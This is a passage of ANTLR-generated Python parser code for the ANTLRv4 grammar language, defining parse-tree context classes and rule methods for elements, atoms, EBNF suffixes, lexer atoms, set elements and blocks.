def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterParserElementAtom" ):
listener.enterParserElementAtom(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitParserElementAtom" ):
listener.exitParserElementAtom(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitParserElementAtom" ):
return visitor.visitParserElementAtom(self)
else:
return visitor.visitChildren(self)
class ParserInlineDocContext(ElementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.ElementContext
super().__init__(parser)
self.value = None # Token
self.copyFrom(ctx)
def DOC_COMMENT(self):
return self.getToken(ANTLRv4Parser.DOC_COMMENT, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterParserInlineDoc" ):
listener.enterParserInlineDoc(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitParserInlineDoc" ):
listener.exitParserInlineDoc(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitParserInlineDoc" ):
return visitor.visitParserInlineDoc(self)
else:
return visitor.visitChildren(self)
class ParserElementActionContext(ElementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.ElementContext
super().__init__(parser)
self.copyFrom(ctx)
def actionBlock(self):
return self.getTypedRuleContext(ANTLRv4Parser.ActionBlockContext,0)
def QUESTION(self):
return self.getToken(ANTLRv4Parser.QUESTION, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterParserElementAction" ):
listener.enterParserElementAction(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitParserElementAction" ):
listener.exitParserElementAction(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitParserElementAction" ):
return visitor.visitParserElementAction(self)
else:
return visitor.visitChildren(self)
def element(self):
localctx = ANTLRv4Parser.ElementContext(self, self._ctx, self.state)
self.enterRule(localctx, 92, self.RULE_element)
self._la = 0 # Token type
try:
self.state = 500
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,59,self._ctx)
if la_ == 1:
localctx = ANTLRv4Parser.ParserElementLabeledContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 483
localctx.value = self.labeledElement()
self.state = 485
self._errHandler.sync(self)
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.QUESTION) | (1 << ANTLRv4Parser.STAR) | (1 << ANTLRv4Parser.PLUS))) != 0):
self.state = 484
localctx.suffix = self.ebnfSuffix()
pass
elif la_ == 2:
localctx = ANTLRv4Parser.ParserElementAtomContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 487
localctx.value = self.atom()
self.state = 489
self._errHandler.sync(self)
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.QUESTION) | (1 << ANTLRv4Parser.STAR) | (1 << ANTLRv4Parser.PLUS))) != 0):
self.state = 488
localctx.suffix = self.ebnfSuffix()
pass
elif la_ == 3:
localctx = ANTLRv4Parser.ParserElementBlockContext(self, localctx)
self.enterOuterAlt(localctx, 3)
self.state = 491
localctx.value = self.block()
self.state = 493
self._errHandler.sync(self)
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.QUESTION) | (1 << ANTLRv4Parser.STAR) | (1 << ANTLRv4Parser.PLUS))) != 0):
self.state = 492
localctx.suffix = self.ebnfSuffix()
pass
elif la_ == 4:
localctx = ANTLRv4Parser.ParserElementActionContext(self, localctx)
self.enterOuterAlt(localctx, 4)
self.state = 495
self.actionBlock()
self.state = 497
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.QUESTION:
self.state = 496
self.match(ANTLRv4Parser.QUESTION)
pass
elif la_ == 5:
localctx = ANTLRv4Parser.ParserInlineDocContext(self, localctx)
self.enterOuterAlt(localctx, 5)
self.state = 499
localctx.value = self.match(ANTLRv4Parser.DOC_COMMENT)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class LabeledElementContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def identifier(self):
return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)
def ASSIGN(self):
return self.getToken(ANTLRv4Parser.ASSIGN, 0)
def PLUS_ASSIGN(self):
return self.getToken(ANTLRv4Parser.PLUS_ASSIGN, 0)
def atom(self):
return self.getTypedRuleContext(ANTLRv4Parser.AtomContext,0)
def block(self):
return self.getTypedRuleContext(ANTLRv4Parser.BlockContext,0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_labeledElement
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLabeledElement" ):
listener.enterLabeledElement(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLabeledElement" ):
listener.exitLabeledElement(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLabeledElement" ):
return visitor.visitLabeledElement(self)
else:
return visitor.visitChildren(self)
def labeledElement(self):
localctx = ANTLRv4Parser.LabeledElementContext(self, self._ctx, self.state)
self.enterRule(localctx, 94, self.RULE_labeledElement)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 502
self.identifier()
self.state = 503
_la = self._input.LA(1)
if not(_la==ANTLRv4Parser.ASSIGN or _la==ANTLRv4Parser.PLUS_ASSIGN):
self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
self.state = 506
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [ANTLRv4Parser.TOKEN_REF, ANTLRv4Parser.RULE_REF, ANTLRv4Parser.STRING_LITERAL, ANTLRv4Parser.DOT, ANTLRv4Parser.NOT]:
self.state = 504
self.atom()
pass
elif token in [ANTLRv4Parser.LPAREN]:
self.state = 505
self.block()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class EbnfSuffixContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def QUESTION(self, i:int=None):
if i is None:
return self.getTokens(ANTLRv4Parser.QUESTION)
else:
return self.getToken(ANTLRv4Parser.QUESTION, i)
def STAR(self):
return self.getToken(ANTLRv4Parser.STAR, 0)
def PLUS(self):
return self.getToken(ANTLRv4Parser.PLUS, 0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_ebnfSuffix
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterEbnfSuffix" ):
listener.enterEbnfSuffix(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitEbnfSuffix" ):
listener.exitEbnfSuffix(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitEbnfSuffix" ):
return visitor.visitEbnfSuffix(self)
else:
return visitor.visitChildren(self)
def ebnfSuffix(self):
localctx = ANTLRv4Parser.EbnfSuffixContext(self, self._ctx, self.state)
self.enterRule(localctx, 96, self.RULE_ebnfSuffix)
self._la = 0 # Token type
try:
self.state = 520
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [ANTLRv4Parser.QUESTION]:
self.enterOuterAlt(localctx, 1)
self.state = 508
self.match(ANTLRv4Parser.QUESTION)
self.state = 510
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.QUESTION:
self.state = 509
self.match(ANTLRv4Parser.QUESTION)
pass
elif token in [ANTLRv4Parser.STAR]:
self.enterOuterAlt(localctx, 2)
self.state = 512
self.match(ANTLRv4Parser.STAR)
self.state = 514
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.QUESTION:
self.state = 513
self.match(ANTLRv4Parser.QUESTION)
pass
elif token in [ANTLRv4Parser.PLUS]:
self.enterOuterAlt(localctx, 3)
self.state = 516
self.match(ANTLRv4Parser.PLUS)
self.state = 518
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.QUESTION:
self.state = 517
self.match(ANTLRv4Parser.QUESTION)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class LexerAtomContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return ANTLRv4Parser.RULE_lexerAtom
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class LexerAtomNotContext(LexerAtomContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.LexerAtomContext
super().__init__(parser)
self.copyFrom(ctx)
def notSet(self):
return self.getTypedRuleContext(ANTLRv4Parser.NotSetContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerAtomNot" ):
listener.enterLexerAtomNot(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerAtomNot" ):
listener.exitLexerAtomNot(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerAtomNot" ):
return visitor.visitLexerAtomNot(self)
else:
return visitor.visitChildren(self)
class LexerAtomRangeContext(LexerAtomContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.LexerAtomContext
super().__init__(parser)
self.copyFrom(ctx)
def characterRange(self):
return self.getTypedRuleContext(ANTLRv4Parser.CharacterRangeContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerAtomRange" ):
listener.enterLexerAtomRange(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerAtomRange" ):
listener.exitLexerAtomRange(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerAtomRange" ):
return visitor.visitLexerAtomRange(self)
else:
return visitor.visitChildren(self)
class LexerAtomCharSetContext(LexerAtomContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.LexerAtomContext
super().__init__(parser)
self.value = None # Token
self.copyFrom(ctx)
def LEXER_CHAR_SET(self):
return self.getToken(ANTLRv4Parser.LEXER_CHAR_SET, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerAtomCharSet" ):
listener.enterLexerAtomCharSet(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerAtomCharSet" ):
listener.exitLexerAtomCharSet(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerAtomCharSet" ):
return visitor.visitLexerAtomCharSet(self)
else:
return visitor.visitChildren(self)
class LexerAtomWildcardContext(LexerAtomContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.LexerAtomContext
super().__init__(parser)
self.copyFrom(ctx)
def DOT(self):
return self.getToken(ANTLRv4Parser.DOT, 0)
def elementOptions(self):
return self.getTypedRuleContext(ANTLRv4Parser.ElementOptionsContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerAtomWildcard" ):
listener.enterLexerAtomWildcard(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerAtomWildcard" ):
listener.exitLexerAtomWildcard(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerAtomWildcard" ):
return visitor.visitLexerAtomWildcard(self)
else:
return visitor.visitChildren(self)
class LexerAtomTerminalContext(LexerAtomContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.LexerAtomContext
super().__init__(parser)
self.copyFrom(ctx)
def terminal(self):
return self.getTypedRuleContext(ANTLRv4Parser.TerminalContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerAtomTerminal" ):
listener.enterLexerAtomTerminal(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerAtomTerminal" ):
listener.exitLexerAtomTerminal(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerAtomTerminal" ):
return visitor.visitLexerAtomTerminal(self)
else:
return visitor.visitChildren(self)
class LexerAtomDocContext(LexerAtomContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.LexerAtomContext
super().__init__(parser)
self.value = None # Token
self.copyFrom(ctx)
def DOC_COMMENT(self):
return self.getToken(ANTLRv4Parser.DOC_COMMENT, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerAtomDoc" ):
listener.enterLexerAtomDoc(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerAtomDoc" ):
listener.exitLexerAtomDoc(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerAtomDoc" ):
return visitor.visitLexerAtomDoc(self)
else:
return visitor.visitChildren(self)
def lexerAtom(self):
localctx = ANTLRv4Parser.LexerAtomContext(self, self._ctx, self.state)
self.enterRule(localctx, 98, self.RULE_lexerAtom)
self._la = 0 # Token type
try:
self.state = 531
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,66,self._ctx)
if la_ == 1:
localctx = ANTLRv4Parser.LexerAtomRangeContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 522
self.characterRange()
pass
elif la_ == 2:
localctx = ANTLRv4Parser.LexerAtomTerminalContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 523
self.terminal()
pass
elif la_ == 3:
localctx = ANTLRv4Parser.LexerAtomNotContext(self, localctx)
self.enterOuterAlt(localctx, 3)
self.state = 524
self.notSet()
pass
elif la_ == 4:
localctx = ANTLRv4Parser.LexerAtomCharSetContext(self, localctx)
self.enterOuterAlt(localctx, 4)
self.state = 525
localctx.value = self.match(ANTLRv4Parser.LEXER_CHAR_SET)
pass
elif la_ == 5:
localctx = ANTLRv4Parser.LexerAtomWildcardContext(self, localctx)
self.enterOuterAlt(localctx, 5)
self.state = 526
self.match(ANTLRv4Parser.DOT)
self.state = 528
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.LT:
self.state = 527
self.elementOptions()
pass
elif la_ == 6:
localctx = ANTLRv4Parser.LexerAtomDocContext(self, localctx)
self.enterOuterAlt(localctx, 6)
self.state = 530
localctx.value = self.match(ANTLRv4Parser.DOC_COMMENT)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class AtomContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return ANTLRv4Parser.RULE_atom
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class AtomTerminalContext(AtomContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.AtomContext
super().__init__(parser)
self.copyFrom(ctx)
def terminal(self):
return self.getTypedRuleContext(ANTLRv4Parser.TerminalContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAtomTerminal" ):
listener.enterAtomTerminal(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAtomTerminal" ):
listener.exitAtomTerminal(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitAtomTerminal" ):
return visitor.visitAtomTerminal(self)
else:
return visitor.visitChildren(self)
class AtomWildcardContext(AtomContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.AtomContext
super().__init__(parser)
self.copyFrom(ctx)
def DOT(self):
return self.getToken(ANTLRv4Parser.DOT, 0)
def elementOptions(self):
return self.getTypedRuleContext(ANTLRv4Parser.ElementOptionsContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAtomWildcard" ):
listener.enterAtomWildcard(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAtomWildcard" ):
listener.exitAtomWildcard(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitAtomWildcard" ):
return visitor.visitAtomWildcard(self)
else:
return visitor.visitChildren(self)
class AtomRuleRefContext(AtomContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.AtomContext
super().__init__(parser)
self.copyFrom(ctx)
def ruleref(self):
return self.getTypedRuleContext(ANTLRv4Parser.RulerefContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAtomRuleRef" ):
listener.enterAtomRuleRef(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAtomRuleRef" ):
listener.exitAtomRuleRef(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitAtomRuleRef" ):
return visitor.visitAtomRuleRef(self)
else:
return visitor.visitChildren(self)
class AtomNotContext(AtomContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.AtomContext
super().__init__(parser)
self.copyFrom(ctx)
def notSet(self):
return self.getTypedRuleContext(ANTLRv4Parser.NotSetContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAtomNot" ):
listener.enterAtomNot(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAtomNot" ):
listener.exitAtomNot(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitAtomNot" ):
return visitor.visitAtomNot(self)
else:
return visitor.visitChildren(self)
def atom(self):
localctx = ANTLRv4Parser.AtomContext(self, self._ctx, self.state)
self.enterRule(localctx, 100, self.RULE_atom)
self._la = 0 # Token type
try:
self.state = 540
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [ANTLRv4Parser.TOKEN_REF, ANTLRv4Parser.STRING_LITERAL]:
localctx = ANTLRv4Parser.AtomTerminalContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 533
self.terminal()
pass
elif token in [ANTLRv4Parser.RULE_REF]:
localctx = ANTLRv4Parser.AtomRuleRefContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 534
self.ruleref()
pass
elif token in [ANTLRv4Parser.NOT]:
localctx = ANTLRv4Parser.AtomNotContext(self, localctx)
self.enterOuterAlt(localctx, 3)
self.state = 535
self.notSet()
pass
elif token in [ANTLRv4Parser.DOT]:
localctx = ANTLRv4Parser.AtomWildcardContext(self, localctx)
self.enterOuterAlt(localctx, 4)
self.state = 536
self.match(ANTLRv4Parser.DOT)
self.state = 538
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.LT:
self.state = 537
self.elementOptions()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class NotSetContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return ANTLRv4Parser.RULE_notSet
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class NotBlockContext(NotSetContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.NotSetContext
super().__init__(parser)
self.value = None # BlockSetContext
self.copyFrom(ctx)
def NOT(self):
return self.getToken(ANTLRv4Parser.NOT, 0)
def blockSet(self):
return self.getTypedRuleContext(ANTLRv4Parser.BlockSetContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterNotBlock" ):
listener.enterNotBlock(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitNotBlock" ):
listener.exitNotBlock(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitNotBlock" ):
return visitor.visitNotBlock(self)
else:
return visitor.visitChildren(self)
class NotElementContext(NotSetContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.NotSetContext
super().__init__(parser)
self.value = None # SetElementContext
self.copyFrom(ctx)
def NOT(self):
return self.getToken(ANTLRv4Parser.NOT, 0)
def setElement(self):
return self.getTypedRuleContext(ANTLRv4Parser.SetElementContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterNotElement" ):
listener.enterNotElement(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitNotElement" ):
listener.exitNotElement(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitNotElement" ):
return visitor.visitNotElement(self)
else:
return visitor.visitChildren(self)
def notSet(self):
localctx = ANTLRv4Parser.NotSetContext(self, self._ctx, self.state)
self.enterRule(localctx, 102, self.RULE_notSet)
try:
self.state = 546
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,69,self._ctx)
if la_ == 1:
localctx = ANTLRv4Parser.NotElementContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 542
self.match(ANTLRv4Parser.NOT)
self.state = 543
localctx.value = self.setElement()
pass
elif la_ == 2:
localctx = ANTLRv4Parser.NotBlockContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 544
self.match(ANTLRv4Parser.NOT)
self.state = 545
localctx.value = self.blockSet()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class BlockSetContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self._setElement = None # SetElementContext
self.elements = list() # of SetElementContexts
def LPAREN(self):
return self.getToken(ANTLRv4Parser.LPAREN, 0)
def RPAREN(self):
return self.getToken(ANTLRv4Parser.RPAREN, 0)
def setElement(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.SetElementContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.SetElementContext,i)
def OR(self, i:int=None):
if i is None:
return self.getTokens(ANTLRv4Parser.OR)
else:
return self.getToken(ANTLRv4Parser.OR, i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_blockSet
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterBlockSet" ):
listener.enterBlockSet(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitBlockSet" ):
listener.exitBlockSet(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitBlockSet" ):
return visitor.visitBlockSet(self)
else:
return visitor.visitChildren(self)
def blockSet(self):
localctx = ANTLRv4Parser.BlockSetContext(self, self._ctx, self.state)
self.enterRule(localctx, 104, self.RULE_blockSet)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 548
self.match(ANTLRv4Parser.LPAREN)
self.state = 549
localctx._setElement = self.setElement()
localctx.elements.append(localctx._setElement)
self.state = 554
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.OR:
self.state = 550
self.match(ANTLRv4Parser.OR)
self.state = 551
localctx._setElement = self.setElement()
localctx.elements.append(localctx._setElement)
self.state = 556
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 557
self.match(ANTLRv4Parser.RPAREN)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class SetElementContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return ANTLRv4Parser.RULE_setElement
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class SetElementRefContext(SetElementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.SetElementContext
super().__init__(parser)
self.value = None # Token
self.copyFrom(ctx)
def TOKEN_REF(self):
return self.getToken(ANTLRv4Parser.TOKEN_REF, 0)
def elementOptions(self):
return self.getTypedRuleContext(ANTLRv4Parser.ElementOptionsContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSetElementRef" ):
listener.enterSetElementRef(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSetElementRef" ):
listener.exitSetElementRef(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitSetElementRef" ):
return visitor.visitSetElementRef(self)
else:
return visitor.visitChildren(self)
class SetElementRangeContext(SetElementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.SetElementContext
super().__init__(parser)
self.copyFrom(ctx)
def characterRange(self):
return self.getTypedRuleContext(ANTLRv4Parser.CharacterRangeContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSetElementRange" ):
listener.enterSetElementRange(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSetElementRange" ):
listener.exitSetElementRange(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitSetElementRange" ):
return visitor.visitSetElementRange(self)
else:
return visitor.visitChildren(self)
class SetElementLitContext(SetElementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.SetElementContext
super().__init__(parser)
self.value = None # Token
self.copyFrom(ctx)
def STRING_LITERAL(self):
return self.getToken(ANTLRv4Parser.STRING_LITERAL, 0)
def elementOptions(self):
return self.getTypedRuleContext(ANTLRv4Parser.ElementOptionsContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSetElementLit" ):
listener.enterSetElementLit(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSetElementLit" ):
listener.exitSetElementLit(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitSetElementLit" ):
return visitor.visitSetElementLit(self)
else:
return visitor.visitChildren(self)
class SetElementCharSetContext(SetElementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.SetElementContext
super().__init__(parser)
self.value = None # Token
self.copyFrom(ctx)
def LEXER_CHAR_SET(self):
return self.getToken(ANTLRv4Parser.LEXER_CHAR_SET, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSetElementCharSet" ):
listener.enterSetElementCharSet(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSetElementCharSet" ):
listener.exitSetElementCharSet(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitSetElementCharSet" ):
return visitor.visitSetElementCharSet(self)
else:
return visitor.visitChildren(self)
def setElement(self):
localctx = ANTLRv4Parser.SetElementContext(self, self._ctx, self.state)
self.enterRule(localctx, 106, self.RULE_setElement)
self._la = 0 # Token type
try:
self.state = 569
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,73,self._ctx)
if la_ == 1:
localctx = ANTLRv4Parser.SetElementRefContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 559
localctx.value = self.match(ANTLRv4Parser.TOKEN_REF)
self.state = 561
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.LT:
self.state = 560
self.elementOptions()
pass
elif la_ == 2:
localctx = ANTLRv4Parser.SetElementLitContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 563
localctx.value = self.match(ANTLRv4Parser.STRING_LITERAL)
self.state = 565
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.LT:
self.state = 564
self.elementOptions()
pass
elif la_ == 3:
localctx = ANTLRv4Parser.SetElementRangeContext(self, localctx)
self.enterOuterAlt(localctx, 3)
self.state = 567
self.characterRange()
pass
elif la_ == 4:
localctx = ANTLRv4Parser.SetElementCharSetContext(self, localctx)
self.enterOuterAlt(localctx, 4)
self.state = 568
localctx.value = self.match(ANTLRv4Parser.LEXER_CHAR_SET)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class BlockContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def LPAREN(self):
return self.getToken(ANTLRv4Parser.LPAREN, 0)
def altList(self):
return self.getTypedRuleContext(ANTLRv4Parser.AltListContext,0)
def RPAREN(self):
return self.getToken(ANTLRv4Parser.RPAREN, 0)
def COLON(self):
return self.getToken(ANTLRv4Parser.COLON, 0)
def optionsSpec(self):
return self.getTypedRuleContext(ANTLRv4Parser.OptionsSpecContext,0)
def ruleAction(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.RuleActionContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.RuleActionContext,i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_block
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterBlock" ):
listener.enterBlock(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitBlock" ):
listener.exitBlock(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitBlock" ):
return visitor.visitBlock(self)
else:
return visitor.visitChildren(self)
def block(self):
localctx = ANTLRv4Parser.BlockContext(self, self._ctx, self.state)
self.enterRule(localctx, 108, self.RULE_block)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 571
self.match(ANTLRv4Parser.LPAREN)
self.state = 582
self._errHandler.sync(self)
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.OPTIONS) | (1 << ANTLRv4Parser.COLON) | (1 << ANTLRv4Parser.AT))) != 0):
self.state = 573
self._errHandler.sync(self)
